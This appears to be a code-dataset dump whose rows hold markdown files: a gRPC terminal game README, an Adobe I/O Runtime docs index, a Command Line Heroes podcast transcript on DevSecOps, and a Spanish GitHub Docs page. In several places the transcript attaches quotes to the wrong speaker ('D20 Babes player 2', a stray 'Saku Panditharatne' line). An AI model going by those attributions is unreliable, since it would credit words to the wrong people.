hexsha
stringlengths
40
40
size
int64
5
1.04M
ext
stringclasses
6 values
lang
stringclasses
1 value
max_stars_repo_path
stringlengths
3
344
max_stars_repo_name
stringlengths
5
125
max_stars_repo_head_hexsha
stringlengths
40
78
max_stars_repo_licenses
sequencelengths
1
11
max_stars_count
int64
1
368k
max_stars_repo_stars_event_min_datetime
stringlengths
24
24
max_stars_repo_stars_event_max_datetime
stringlengths
24
24
max_issues_repo_path
stringlengths
3
344
max_issues_repo_name
stringlengths
5
125
max_issues_repo_head_hexsha
stringlengths
40
78
max_issues_repo_licenses
sequencelengths
1
11
max_issues_count
int64
1
116k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
3
344
max_forks_repo_name
stringlengths
5
125
max_forks_repo_head_hexsha
stringlengths
40
78
max_forks_repo_licenses
sequencelengths
1
11
max_forks_count
int64
1
105k
max_forks_repo_forks_event_min_datetime
stringlengths
24
24
max_forks_repo_forks_event_max_datetime
stringlengths
24
24
content
stringlengths
5
1.04M
avg_line_length
float64
1.14
851k
max_line_length
int64
1
1.03M
alphanum_fraction
float64
0
1
lid
stringclasses
191 values
lid_prob
float64
0.01
1
bb16894e2fb276295486f0b0e2f4daef6e9d52d3
1,675
md
Markdown
README.md
mortenson/grpc-game-example
a7e05d3f6d564c8cee221b4894b85ad2e0b4ba57
[ "MIT" ]
166
2020-04-20T19:50:04.000Z
2022-03-31T07:13:33.000Z
README.md
mortenson/grpc-game-example
a7e05d3f6d564c8cee221b4894b85ad2e0b4ba57
[ "MIT" ]
null
null
null
README.md
mortenson/grpc-game-example
a7e05d3f6d564c8cee221b4894b85ad2e0b4ba57
[ "MIT" ]
23
2020-04-21T14:17:38.000Z
2022-03-15T02:26:40.000Z
# grpc-game-example An example game built using Go, gRPC, and tview. The blog post for this project is a good reference: https://mortenson.coffee/blog/making-multiplayer-game-go-and-grpc I built this as a way to learn more about Go and haven't been using the language for that long so don't judge the code too harshly! ## Game description This is “tshooter” - a local or online multiplayer shooting game you play in your terminal. Players can move in a map and fire lasers at other players. When a player is hit, they respawn on the map and the shooting player’s score is increased. When a player reaches 10 kills, the round ends and a new round begins. You can play the game offline with bots, or online with up to eight players (but that limit is arbitrary). ## Reference and use Here's a quick reference for common operations on the project: ```bash # Download go module dependencies go mod download # Build binaries make build # Run a local, offline game make run # Run a server with defaults make run-server # Run a client make run-client # Run a bot as a client make run-bot-client # Rebuild protobuf make proto # Run gofmt make fmt ``` If you run the commands or binaries directly more command line options are available: ```bash # Run a server go run cmd/server.go -port=9999 -bots=2 -password=foo # Run a local, offline game go run cmd/client_local.go -bots=2 # Run a bot as a client go run cmd/bot_client.go -address=":9999" ``` # Using binaries Using `make`, binaries are output to the `bin` directory in the format `tshooter_ARCH_COMMAND`. For ease of use, "launcher" binaries are also generated which can be double clicked to open a terminal window.
28.389831
117
0.762388
eng_Latn
0.998468
bb1723c02656324b2b846396149260148bbf118f
2,981
md
Markdown
README.md
purplecabbage/adobeio-runtime
a8a1045a468198c845f0513c112533ffc62b009d
[ "MIT" ]
null
null
null
README.md
purplecabbage/adobeio-runtime
a8a1045a468198c845f0513c112533ffc62b009d
[ "MIT" ]
null
null
null
README.md
purplecabbage/adobeio-runtime
a8a1045a468198c845f0513c112533ffc62b009d
[ "MIT" ]
null
null
null
# Adobe I/O Runtime Developer Guide This guide will give you an overview of Adobe I/O Runtime, explain how it works, and get you started with developing your own integrations. ## Contents [Overview](overview.md) * [What is Adobe I/O Runtime](overview/what_is_runtime.md) * [Use Cases for Adobe I/O Runtime](overview/usecases.md) * [How Adobe I/O Runtime Works](overview/howitworks.md) * [Adobe I/O Runtime Entities](overview/entities.md) [Quickstarts](quickstarts.md) * [Setting up Your Environment](quickstarts/setup.md) * [Deploying your First Adobe I/O Runtime Function](quickstarts/deploy.md) * [Retrieve Action Invocation Results](quickstarts/activations.md) [Guides](guides.md) * [Creating Actions](guides/creating_actions.md): actions, web actions, invoking and managing, setting parameters * [Asynchronous Calls](guides/asynchronous_calls.md): how to execute long running async (non-blocking) calls * [Throughput Tuning](guides/throughput_tuning.md): how to maximize the number of action invocations * [Security Guide](guides/security_general.md): discover potential security issues and how to address them * [Securing Web Actions](guides/securing_web_actions.md): learn how to control the access to web actions * [Creating REST APIs](guides/creating_rest_apis.md): learn to create REST APIs from web actions * [Using Packages](guides/using_packages.md): Working with packages * [Logging and Monitoring](guides/logging_monitoring.md): learn how to troubleshoot your actions * [Debugging](guides/debugging.md): advanced debugging for Node.js actions * [System Settings](guides/system_settings.md): see the system settings and constraints * [CI/CD Pipeline](guides/ci-cd_pipeline.md): understand the tools you have to create a CI/CD Pipeline [Reference Documentation](reference.md) * [aio CLI](reference/cli_use.md): how to use aio CLI * [wsk CLI](reference/wsk_use.md): how to use wsk CLI * [Multiple Regions](reference/multiple-regions.md): where we run your actions * [Pre-installed Packages](reference/prepackages.md): what packages are pre-installed * [Runtimes](reference/runtimes.md): details about the available runtimes * [API Reference](reference/api_ref.md): I/O Management API * [Triggers & Rules](reference/triggersrules.md): working with triggers and rules * [Sequences & Compositions](reference/sequences_compositions.md): orchestrating actions * [Packages](reference/packages.md): working with packages * [Feeds](reference/feeds.md): working with feeds [Tools](tools.md) * [`aio` CLI](./tools/cli_install.md) - this tool helps you manage your namespaces and the authentication for the `wsk` CLI * [`wsk` CLI](./tools/wsk_install.md) - this tool is the main interface for managing your actions/packages/rules/triggers and getting access to activation results/errors/logs * [`wskdeploy` CLI](./tools/wskdeploy_install.md) - this tool helps you deploy multiple actions and packages [Resources and Support](resources.md) * [FAQ](resources/faq.md)
54.2
174
0.777927
eng_Latn
0.865335
bb1793355fda2c10cd476106f8ee0d3ce9d06c5e
25,307
md
Markdown
sources/command-line-heroes-season-2-the-one-about-devsecops.md
this-is-name-right/LCRH
9517b537b3717b7cc533de9674186d6ce909b070
[ "Apache-2.0" ]
null
null
null
sources/command-line-heroes-season-2-the-one-about-devsecops.md
this-is-name-right/LCRH
9517b537b3717b7cc533de9674186d6ce909b070
[ "Apache-2.0" ]
null
null
null
sources/command-line-heroes-season-2-the-one-about-devsecops.md
this-is-name-right/LCRH
9517b537b3717b7cc533de9674186d6ce909b070
[ "Apache-2.0" ]
null
null
null
[#]: collector: (bestony) [#]: translator: ( ) [#]: reviewer: ( ) [#]: publisher: ( ) [#]: url: ( ) [#]: subject: (Command Line Heroes: Season 2: The One About DevSecOps) [#]: via: (https://www.redhat.com/en/command-line-heroes/season-2/the-one-about-devsecops) [#]: author: (RedHat https://www.redhat.com/en/command-line-heroes) Command Line Heroes: Season 2: The One About DevSecOps ====== **00:01** - _House subcommittee representative_ On June the 26th, 1991, Washington DC, much of Maryland and West Virginia, major portions of my home state were paralyzed by massive failure in the public telephone network. And yet, as technology becomes more sophisticated and network systems more interdependent, the likelihood of recurrent failures increases. It's not as though there wasn't warning that this would happen. **00:23** - _Saron Yitbarek_ In the early 1990s, 12 million Americans were hit with massive phone network failures. People couldn't call the hospital. Businesses couldn't call customers. Parents couldn't call their daycares. It was chaos and it was also a serious wake-up call, a wake-up call for a country whose infrastructure relied heavily on the computer systems that networked everything. Those computer networks were growing larger and larger, and then when they failed, yeah, they failed big time. **01:01** - _Saron Yitbarek_ A computer failure caused that phone system crash. This tiny one line bug in the code, and today the consequences of little bugs like that are higher than ever. **01:15** - _Saron Yitbarek_ I'm Saron Yitbarek and this is Command Line Heroes, an original podcast from Red Hat. **01:24** - _Saron Yitbarek_ So software security and reliability matter more than ever. The old waterfall approach to development, where security was just tacked onto the end of things, that doesn't cut it anymore. We're living in a DevOps world where everything is faster, more agile, and scalable in ways they couldn't even imagine back when that phone network crashed. That means our security and reliability standards have to evolve to meet those challenges. **01:55** - _Saron Yitbarek_ In this episode, we're going to figure out how to integrate security into DevOps, and we're also exploring new approaches to building reliability and resilience into operations. Even after covering all that, we know there's so much more we could talk about because in a DevSecOps world, things are changing fast for both the developers and operations. These changes mean different things depending on where you're standing, but this is our take. We'd love to hear yours too—so don't be shy if you think we've missed something—hit us up online. **02:34** - _Saron Yitbarek_ All right, let's dig in and start exploring this brand new territory. **02:43** - _Saron Yitbarek_ Here's the thing, getting security and reliability up to speed, getting it ready for a DevOps world, means we have to make a couple of key adjustments to the way we work. Number one, we have to embrace automation. I mean, think about the logistics of say two-factor authentication. Think of the impossibly huge task that poses. It's pretty obvious you're not going to solve things by just adding more staff, so that's number one, embracing automation. **03:15** - _Saron Yitbarek_ And then, number two, and this one's maybe less obvious, it's really changing the culture so security isn't a boogeyman anymore. I'm going to explain what I mean by changing the culture later on, but let's tackle these two steps one at a time. First up, embracing automation. **03:42** - _Saron Yitbarek_ Once upon a time app deployment involved a human-driven security review before every single release, and I don't know if you've noticed, but humans, they can be a little slow. That's why automation is such a key part of building security into DevOps. Take, for example, this recent data breach report from Verizon. They found that 81% of all hacking–related breaches involve stolen or weak passwords, and that's on the face of it such a simple problem. But it's a simple problem at a huge scale. Like I mentioned before, you're not going to staff your way out of 30 million password issues, right? The hurdle is addressing that problem of scale, the huge size of it, and the answer is the same every time. It's automation, automation. **04:36** - _Vincent Danen_ If you wait for a human being to get involved, it's not going to scale. **04:41** - _D20 Babes player 2_ Vincent Danen is the director of product security at Red Hat and over the 20 years he's been at this, he's watched as DevOps created a faster and faster environment. Security teams have had to race to keep up. **04:56** - _Vincent Danen_ When I started, it was a vulnerability per month and then it started becoming every other week and then every week, and now we're into the, you know, literally finding hundreds of these things every day. **05:08** - _Saron Yitbarek_ What's interesting here is that Vincent says there are actually more vulnerabilities showing up as security teams evolve, not less. **05:17** - _Vincent Danen_ We'll never get to the point where we say, oh, we're secure now, we're done. Our job is over. It'll always be there. It's just something that has to be as normal as breathing now. **05:27** - _Saron Yitbarek_ It turns out what counts as an issue for security and reliability teams is becoming more and more nuanced. **05:35** - _Vincent Danen_ As we're looking for these things, we're finding more and this trend is going to continue as you find new classes of vulnerabilities and things we maybe didn't think were important or didn't even know they existed before. We're finding out about these things much faster and there's more of them. And so the scale kind of explodes. It's knowledge. It's volume of software. It's number of consumers. All of these things contribute to the growth of security in this area and the vulnerabilities that we're finding. **06:06** - _Saron Yitbarek_ Once you see security as an evolving issue rather than one that gets "solved" over time, the case for automation, well, it gets even stronger. **06:18** - _Vincent Danen_ Well, I think with automation you can integrate this stuff into your development pipelines in a way that is very fast, for one. For two, you don't require human beings to do this effort, right? Computers don't need to sleep, so you can churn through code as fast as your processors will allow rather than waiting for a human to pour through some maybe rather tedious lines of code to go looking for vulnerabilities. **06:44** - _Vincent Danen_ And then with pattern-matching and heuristics, you can actually determine what's vulnerable even at the time of writing the code to begin with. So if you have, like, a plug-in, you know, for your IDE or your tool that you're using to write your code, it can tell you as you're writing it, like, hey, maybe this looks a little fishy, or you've just introduced a vulnerability and you can correct these things before you even commit the code. **07:08** - _Saron Yitbarek_ Security on the move. That's a huge bonus. **07:12** - _Vincent Danen_ There's just so much that's coming out every, every day, every hour even. With continuous integration and continuous delivery, you write code and it's deployed 10 minutes later. All right, so it's really critical to get that validation of that code automatically prior to it being pushed out. **07:32** - _Saron Yitbarek_ A whole breadth of tools are available so we can actually get this done, whether it's static code analysis or plug-ins for your IDE or a whole bunch of other options. We'll share some of our favorites in the show notes for this episode over at redhat.com/commandlineheroes. **07:53** - _Saron Yitbarek_ Once we've got those tools in place, they help keep security top of mind. The result, DevOps gets re-imagined as DevSecOps. Security gets baked into the process. **08:08** - _Vincent Danen_ In the same way that developers and operations kind of combined, you took those two disciplines to generate one. Now you have DevOps, and taking that third component of security and integrating that in with development and operations, I think is really important because having security as the afterthought is what makes security so reactive, so expensive, so damaging or potentially damaging to consumers. And when you plug that in right at the beginning, you have development being done, securities in there from start to finish and the operations work. **08:44** - _Saron Yitbarek_ Of course, like we mentioned at the top of the episode, automation is really just one half of a bigger pie and Vincent gets that. **08:53** - _Vincent Danen_ It's not just one piece. You can't just, you know, throw a tool in your CI/CD pipeline and expect everything to be okay. There's a whole gamut of different techniques and technologies and behaviors that are required to produce those ultimate beneficial results that we want to see. **09:15** - _Saron Yitbarek_ Automation does get us partway there, but we've got to remember the other piece—that slightly fuzzier piece. Say it with me, the culture piece, getting developers and ops both on board so that these issues aren't boogeyman anymore. **09:33** - _Saron Yitbarek_ We have to change a culture and some folks are learning to do that in the least painful way possible, with games. **09:44** - _Saron Yitbarek_ Let's take a swing over to the op side of things now. It's so easy to stand up huge infrastructure these days, but that doesn't mean we should be doing shoddy work. We should still be hammering on our systems, ensuring reliability, figuring out how to prepare for the unexpected. That's the mindset Jesse Robbins is working to bring about. **10:08** - _Saron Yitbarek_ Today Jesse is the CEO of Orion Labs, but before that he was known as the master of disaster over at Amazon. During his time there, Jesse was pretty much a wizard at getting everybody at least aware of these issues. And he did it with something called Game Day. These can involve thousands of employees running through disaster scenario drills, getting used to the idea of things breaking and getting intimate with the why and the how. **10:39** - _Saron Yitbarek_ Here's Jesse and me talking it over, looking especially at how reliability and resilience get built into the operation side. **10:47** - _Saron Yitbarek_ Very cool. So you are known for many things, but one of those things is the exercise Game Day, what you did at Amazon. What is that? What's Game Day? **10:58** - _Jesse Robbins_ So Game Day was a program that I created to test the operational readiness of the most vulnerable systems by breaking things at massive scale. So if you're a fan of what's called Chaos Monkey Now by the Netflix people and others, Game Day was the name for my program that definitely proceeded all of that. It was really heavily focused on building a culture of operational excellence, building the capability to test systems at massive scale when they're breaking, learn how they break to improve them. And then also to build a culture that is capable of responding to and recovering from incidents in situations. And it was all modeled and is all modeled after the incident command system, which is what the fire departments use around the world for dealing with incidents of any size. **11:56** - _Jesse Robbins_ It was sort of born from ... **11:58** - _Saron Yitbarek_ Crazy side note, Jesse trained to be a firefighter back in 2005. And that's where he learned this incident command system that ended up inspiring Game Day. So all the developers doing these disaster scenarios out there, you've got Jesse's passion for firefighting and emergency management to thank for that. Okay, back to our chat. **12:22** - _Jesse Robbins_ Resilience is the ability of a system, and that includes people and the things that those people build to adapt to change, to respond to failures and disturbances. And one of the best ways to build that—to build a culture that can respond to those types of environments and really understands how those work—is to provide people training exercises. And those exercises can be as simple as something like, you know, rebooting a server or as complicated as a injecting massive scale faults by turning off entire datacenters and kind of everything in between. And so what a Game Day is is first of all a process where you prepare for something by getting an entire organization together and kind of talking about how systems fail and thinking about what human beings know about how they expect failure to happen. And that exercise by itself is often one of the most valuable parts of kind of the beginning of a Game Day. **13:24** - _Jesse Robbins_ But then you actually run an exercise where you break something. It could be something big, it could be something small. It could be something that breaks all the time. And when you do that, you're able to study how everyone responds where things can move to. You can see the system breaking and that might be something that is safe to break, a well-understood component or it might be something that exposes what we call a latent defect. Those are those problems hiding in software or in technology or in a system at scale that we only can find out about when you have an extreme or an unexpected event. It's really designed to train people and to build systems that you understand how they're going to work under stress and under strain. **14:12** - _Saron Yitbarek_ And so when I hear Game Day, it makes me think, “Was this a response to something very specific that happened, that inspired it? Where'd it come from?” **14:20** - _Jesse Robbins_ So Game Day started during a period of time where I knew because of my role and because of my unique background as a firefighter and emergency manager, that it was important to change the cultural approach from focusing on the idea of preventing failure to instead embracing failure, accepting that failure happens. And part of what inspired that was both my own experience, you know, understanding systems, how like buildings fail and how civic infrastructure fails, and how disasters happened, and the strain that that puts on people. And saying, well, if we look at the complexity and operational scale that we have at the place of employment that I was at, the only way that we're really going to build and change and become a high-reliability, always-on environment, is truly to embrace the fire service approach. Where we know that failures will happen. It's not a question of if, it's a question of when. And then as my old fire chief would say, you don't choose the moment, the moment chooses you. You only choose how prepared you are when it does. **15:28** - _Saron Yitbarek_ Oh, that's a good one. So when you first started doing the Game Days and thinking about how to be prepared for disaster scenarios, was everyone on board with this or did you get any pushback? **15:40** - _Jesse Robbins_ Everyone thought I was crazy. So definitely there were people that resisted it. And it's interesting because there was a really simple way of overcoming that resistance, which is first creating what I call champions. You want to teach people, a small group, how to work in a way that is very safe and then you want to give them some exposure and then you want to use a set of metrics where you're able to say, look, let's just measure how many minutes of outage there is, how many minutes of downtime my team has that has this training and operates this way. Versus, I don't know, your team, who does not have that and who seems to think that doing this type of training and exercises isn't valuable or isn't important. **16:25** - _Jesse Robbins_ And once you do that kind of thing, you basically end up with what I call a compelling event. So, often there'll be an outage or some other thing where the organization suddenly and starkly realizes, oh my goodness, we can't keep doing things the way that we've been doing them before. And that becomes the method you use to overcome the skeptics. You use a combination of data and performance information on the one hand, coupled with metrics, and then great storytelling, and then you wait for the big one or the scary incident that happens and you say, you know, the whole organization needs this ability if we're going to operate at web scale or internet scale. **17:06** - _Saron Yitbarek_ Mm-hmm (affirmative). So what I love about this is that it didn't just stay within Amazon. It spread. A lot of other companies are doing it. A lot of people have ended up embracing this knowledge and this process to, you know, to be prepared. What is next? How do we continue carrying on the knowledge from Game Day into future projects and future companies? **17:31** - _Jesse Robbins_ I like to talk about it as convergent evolution. So every large organization that operates on the web has now adopted a version of both the incident management foundation that I certainly advocated for and has created their own Game Day testing. You know, Netflix calls it the Chaos Monkey. And Google has their Dirt program. **17:57** - _Saron Yitbarek_ So what are your hopes and dreams for Game Day in the future? **18:00** - _Jesse Robbins_ What I am excited about first of all is that we are seeing this evolution now from a thinking of silos and thinking of systems as being disconnected. Systems being fundamentally interconnected, interdependent and built and run by smart people around the world that are trying to do great and big things. **18:22** - _Jesse Robbins_ Years ago when I got my start, caring about operations was a backwater. It was not an interesting place. And suddenly we found ourselves being able to propagate the idea that developers and operations people working together are the only way that meaningful technology gets built and run in a connected world. **18:44** - _Jesse Robbins_ And so my hope for the future is number one, we're seeing more and more people embracing these ideas and learning about them. Understanding that when you build something that people depend on, you have an obligation to make sure that it's reliable, it's usable, it's dependable, it's something that people can use as part of their daily lives. **19:05** - _Jesse Robbins_ But also we're seeing a new discipline emerge. It's being studied, you know, there's PhD theses being written on it. It's being built out constantly. **19:16** - _Saron Yitbarek_ That's awesome. **19:16** - _Jesse Robbins_ There's books being written, there's all these new resources that aren't, you know, just a couple of people talking at a conference about how they think the world should work. And so my sort of inspirational hope is one, understand that if you're building software and technology that people use, you're really becoming part of the civic infrastructure. And so the set of skills that I've tried to contribute as a firefighter to technology and the skills that are now emerging that are taking that so much farther are part of the foundation for building things that people depend on everyday. **19:53** - _Saron Yitbarek_ Very nice. Oh, that's a great way to end. Thank you so much Jesse for your time. **19:56** - _Jesse Robbins_ Yeah, thank you. **11:59** - _Saku Panditharatne_ And I think all these factors work against adopting the best possible software. **20:02** - _Saron Yitbarek_ In Jesse's vision, exercises like Game Day or Chaos Monkey are a crucial part of our tech culture growing up, but they are also crucial for society at large. And I love that he's putting the stakes that high because he's right. Our world depends on the work we do. That much was obvious back in the 90s when telephone networks started crashing. **20:26** - _House subcommittee representative_ Modern life as we know it almost ground to a halt. **20:31** - _Saron Yitbarek_ And there's a duty that goes along with that. A duty to care about security and reliability, about the resilience of the things we build. Of course, when it comes to building security into DevOps, we're just getting started. **20:53** - _Saron Yitbarek_ That's Josh Bressers. He's the head of product security at a data search software startup called Elastic. For Josh, even though the computer industry's been maturing for a half-century or so, the kind of security we've been talking about here feels like it just came into its own. **21:11** - _Josh Bressers_ Practically speaking, as what I would say maybe a profession, security is still very new and there's a lot of things we don't understand. **21:19** - _Saron Yitbarek_ Here's what we do understand though, in a DevSecOps world, there are some pretty sweet opportunities to get creative about what security can achieve. **21:29** - _Josh Bressers_ I was recently talking to somebody about a concept where they're using user behavior to decide if a user should be able to access the system. Everybody has certain behaviors, be it where they're coming from, time of day they're accessing a system, the way they type, the way they move their mouse. And so they're actually one of those places that I think could have some very powerful results if we can do it right, where we can pay attention to what someone's doing. And then let's say I'm acting weird and you know, I'm weird because I just sprained my wrist. But you know, the other end doesn't know that. **22:05** - _Josh Bressers_ And so it might say, all right, something's weird, we want you to log in with your two-factor auth and we're going to also send you a text message or something. Right? And so we've just gone from essentially username and password to something more interesting. And so I think looking at a lot of these problems in new and unique ways is really going to be key. And in many instances, we're just not there yet. **22:27** - _Saron Yitbarek_ Getting there requires those two big steps we've been describing. Step one, it's that automation, so crucial because ... **22:35** - _Josh Bressers_ Humans are terrible at doing the same thing over and over again. **22:38** - _Saron Yitbarek_ Fair. And then we've got step two, the culture, all of us having a steak insecurity and the liability, no matter what our job title might say. **22:49** - _Josh Bressers_ When most people think of the security team, they don't think of happy nice people, right? It's generally speaking terrible, grumpy, annoying people, who if they show up, they're going to ruin your day. And nobody wants that, right? **23:10** - _Saron Yitbarek_ But I think we can get over that bias because we have to, think of it this way—more security threats happen every day and every day IT infrastructure is growing larger and more powerful. Put those two truths together and you better live in a world where security gets embraced. A very DevSecOps world where developers and operations are upping their security games, upping their reliability games. What I'm talking about is a future where automation is integrated into every stage and everybody's attitudes toward these issues become more holistic. That's how we're going to keep tomorrow's systems safe. That's how we're going to keep the phones ringing, the lights on, all of modern life healthy and strong. If you pull up Forbes’ list of the global 2000 organizations, that's the top 2000 public companies, it turns out a full quarter of them have embraced DevOps. Integrated agile workplaces are becoming the rule of the land. And in a few years thinking in terms of DevSecOps might become second nature. We want to go as fast as possible, but the long game is actually faster when every part of the team is in the race together. **24:40** - _Saron Yitbarek_ Next episode, we're getting hit by the data explosion. Humans have entered the Zettabyte era. By 2020, we'll be storing about 40 zettabytes of information on servers that mostly don't even exist yet. But how are we supposed to make all that data useful? How do we use high-performance computing and open source projects to get our data working for us? We find out in episode 6 of Command Line Heroes. **25:13** - _Saron Yitbarek_ And a reminder, all season long we're working on Command Line Heroes: The Game. It's our very own open source project and we've loved watching it all come together, but we need you to help us finish. If you hit up redhat.com/commandlineheroes, you can discover how to contribute. And you can also dive deeper into anything we've talked about in this episode. **25:39** - _Saron Yitbarek_ Command Line Heroes is an original podcast from Red Hat. Listen for free on Apple Podcasts, Google Podcasts, or wherever you do your thing. I'm Saron Yitbarek. Until next time, keep on coding. -------------------------------------------------------------------------------- via: https://www.redhat.com/en/command-line-heroes/season-2/the-one-about-devsecops 作者:[Red Hat][a] 选题:[bestony][b] 译者:[译者ID](https://github.com/译者ID) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCRH](https://github.com/LCTT/LCRH) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 [a]: https://www.redhat.com/en/command-line-heroes [b]: https://github.com/bestony
82.165584
1,133
0.774173
eng_Latn
0.99973
bb17f057a3672ccf55c3344b4028380aeb71214d
348
md
Markdown
gallery/psget/module/ModuleManifest-Reference.md
RobertoGarrido/powerShell-Docs.es-es
ce4879349fc59870b15f5b44f47e193c2cc7380a
[ "CC-BY-4.0", "MIT" ]
1
2018-12-26T18:20:59.000Z
2018-12-26T18:20:59.000Z
gallery/psget/module/ModuleManifest-Reference.md
gabasch85/powerShell-Docs.es-es
ce4879349fc59870b15f5b44f47e193c2cc7380a
[ "CC-BY-4.0", "MIT" ]
null
null
null
gallery/psget/module/ModuleManifest-Reference.md
gabasch85/powerShell-Docs.es-es
ce4879349fc59870b15f5b44f47e193c2cc7380a
[ "CC-BY-4.0", "MIT" ]
1
2018-12-25T17:39:24.000Z
2018-12-25T17:39:24.000Z
--- ms.date: 2017-06-12 contributor: manikb ms.topic: reference keywords: gallery,powershell,cmdlet,psget title: ModuleManifest-Reference ms.openlocfilehash: a74b7d9cc9201a0c827a597d7d155aa42498c371 ms.sourcegitcommit: 75f70c7df01eea5e7a2c16f9a3ab1dd437a1f8fd ms.translationtype: HT ms.contentlocale: es-ES ms.lasthandoff: 06/12/2017 ---
26.769231
61
0.816092
kor_Hang
0.110463
bb181fd56b30ed9b20f93f37c19a3ea9aa4aefe7
493
md
Markdown
README.md
kntaka/go-luhn
cd0ec3013cf45c4992a30c28b919e26108da01c0
[ "WTFPL" ]
null
null
null
README.md
kntaka/go-luhn
cd0ec3013cf45c4992a30c28b919e26108da01c0
[ "WTFPL" ]
null
null
null
README.md
kntaka/go-luhn
cd0ec3013cf45c4992a30c28b919e26108da01c0
[ "WTFPL" ]
null
null
null
# go-luhn ## Generating and validating Luhn numbers in GO ```go // Checking if a string is a valid luhn luhn.Valid("1234") //= false luhn.Valid("562246784655") //= true // Generating a valid luhn string of a specified size randomLuhn := luhn.Generate(12) fmt.Println(randomLuhn) //= "802252051072" // Generating a valid luhn string of a specified size // with a given prefix randomLuhnWithPrefix := luhn.GenerateWithPrefix(10, "12345") fmt.Println(randomLuhnWithPrefix) //= "1234533220" ```
29
60
0.736308
eng_Latn
0.67999
bb1882aaf3d8a00f9b023436be5f64f4b152437e
4,408
md
Markdown
translations/es-XL/content/github/getting-started-with-github/be-social.md
azrial3/docs
946f71738dd461e7bf2bf4b58873e346f7fe4f33
[ "CC-BY-4.0", "MIT" ]
10
2021-05-10T06:53:57.000Z
2021-05-17T00:08:22.000Z
translations/es-XL/content/github/getting-started-with-github/be-social.md
etherealbeing1/docs
5a91f5a508ba1732bc7fc0894064e759c7cf00c8
[ "CC-BY-4.0", "MIT" ]
51
2021-05-18T21:13:07.000Z
2022-03-22T17:14:01.000Z
translations/es-XL/content/github/getting-started-with-github/be-social.md
ayc222/docs
caff0a0583b193b2766b49ac0008184f13bb9d1c
[ "CC-BY-4.0", "MIT" ]
1
2022-01-27T09:35:19.000Z
2022-01-27T09:35:19.000Z
--- title: Ser social redirect_from: - /be-social/ - /articles/be-social intro: 'Puedes interactuar con personas, repositorios y organizaciones en {% data variables.product.prodname_dotcom %}. Ve en qué están trabajando los demás y con quién se están conectando desde tu tablero personal.' versions: free-pro-team: '*' enterprise-server: '*' github-ae: '*' topics: - Profile - Pull requests - Issues - Notifications - Accounts --- Para conocer más sobre cómo acceder a tu tablero personal, consulta "[Acerca de tu tablero personal](/articles/about-your-personal-dashboard)". ### Seguir a personas Cuando sigues a alguien en {% data variables.product.product_location %}, recibirás notificaciones en tu tablero personal sobre su actividad. Para obtener más información, consulta "[Acerca de tu tablero personal](/articles/about-your-personal-dashboard)". Haz clic en **Follow** (Seguir) en la página de perfil de una persona para seguirla. ![Botón Follow user (Seguir usuario)](/assets/images/help/profile/follow-user-button.png) ### Ver un repositorio Puedes ver un repositorio para recibir notificaciones para las nuevas solicitudes de extracción y propuestas. Cuando el propietario actualiza el repositorio, verás los cambios en tu tablero personal. Para obtener más información, consulta la sección {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "[email protected]" %}"[Visualizar tus suscripciones](/github/managing-subscriptions-and-notifications-on-github/viewing-your-subscriptions){% else %}"[Observar y dejar de observar un repositorio](/github/receiving-notifications-about-activity-on-github/watching-and-unwatching-repositories){% endif %}". Haz clic en **Watch** (Ver) en la parte superior del repositorio que desas ver. ![Botón Watch repository (Ver repositorio)](/assets/images/help/repository/repo-actions-watch.png) ### Unirse a la conversación {% data reusables.support.ask-and-answer-forum %} ### Hacer un poco más #### Crear solicitudes de extracción Es posible que desees contribuir al proyecto de otras personas, ya sea para agregar características o para arreglar errores. Luego de realizar cambios, permite que el autor original lo sepa al enviar una solicitud de extracción. Para obtener más información, consulta "[Acerca de las solicitudes de extracción](/articles/about-pull-requests)." ![Botón Pull request (Solicitud de extracción)](/assets/images/help/repository/repo-actions-pullrequest.png) #### Usar propuestas Al colaborar en un repositorio, usa las propuestas para realizar el seguimiento de ideas, mejoras, tareas o errores. Para obtener más información, consulta '[Acerca de las propuestas](/articles/about-issues/)". ![Botón Issues (Propuestas)](/assets/images/help/repository/repo-tabs-issues.png) #### Participación en las organizaciones Las organizaciones son cuentas compartidas donde las empresas y los proyectos de código abierto pueden colaborar en muchos proyectos a la vez. Los propietarios y administradores pueden establecer equipos con permisos especiales, tener un perfil de organización pública y realizar el seguimiento de la actividad dentro de la organización. Para obtener más información, consulta "[Acerca de las organizaciones](/articles/about-organizations)". ![Desplegable de contexto para cambiar cuenta](/assets/images/help/overview/dashboard-contextswitcher.png) #### Explorar otros proyectos en {% data variables.product.prodname_dotcom %} Descubre proyectos interesantes al utilizar {% data variables.explore.explore_github %}, [Explorar repositorios](https://github.com/explore), y el {% data variables.explore.trending_page %}. Marca con una estrella los proyectos interesantes y regresa posteriormente. Visita tu {% data variables.explore.your_stars_page %} para ver todos los proyectos marcados con una estrella. Para obtener más información, consulta "[Acerca de tu tablero personal](/articles/about-your-personal-dashboard/)". ### Celebrar Ahora estás conectado con la comunidad de {% data variables.product.product_name %}. ¿Qué deseas hacer ahora? ![Marcar un proyecto con una estrella](/assets/images/help/stars/star-a-project.png) - [Configurar Git](/articles/set-up-git) - [Crear un repositorio](/articles/create-a-repo) - [Bifurcar un repositorio](/articles/fork-a-repo) - **Ser social** - {% data reusables.support.connect-in-the-forum-bootcamp %}
58
631
0.780172
spa_Latn
0.960893
bb18db97ce0b1f548615d3cddd7b72da710e90db
2,505
md
Markdown
docs/data/oledb/working-with-ole-db-consumer-templates.md
bobbrow/cpp-docs
769b186399141c4ea93400863a7d8463987bf667
[ "CC-BY-4.0", "MIT" ]
965
2017-06-25T23:57:11.000Z
2022-03-31T14:17:32.000Z
docs/data/oledb/working-with-ole-db-consumer-templates.md
bobbrow/cpp-docs
769b186399141c4ea93400863a7d8463987bf667
[ "CC-BY-4.0", "MIT" ]
3,272
2017-06-24T00:26:34.000Z
2022-03-31T22:14:07.000Z
docs/data/oledb/working-with-ole-db-consumer-templates.md
bobbrow/cpp-docs
769b186399141c4ea93400863a7d8463987bf667
[ "CC-BY-4.0", "MIT" ]
951
2017-06-25T12:36:14.000Z
2022-03-26T22:49:06.000Z
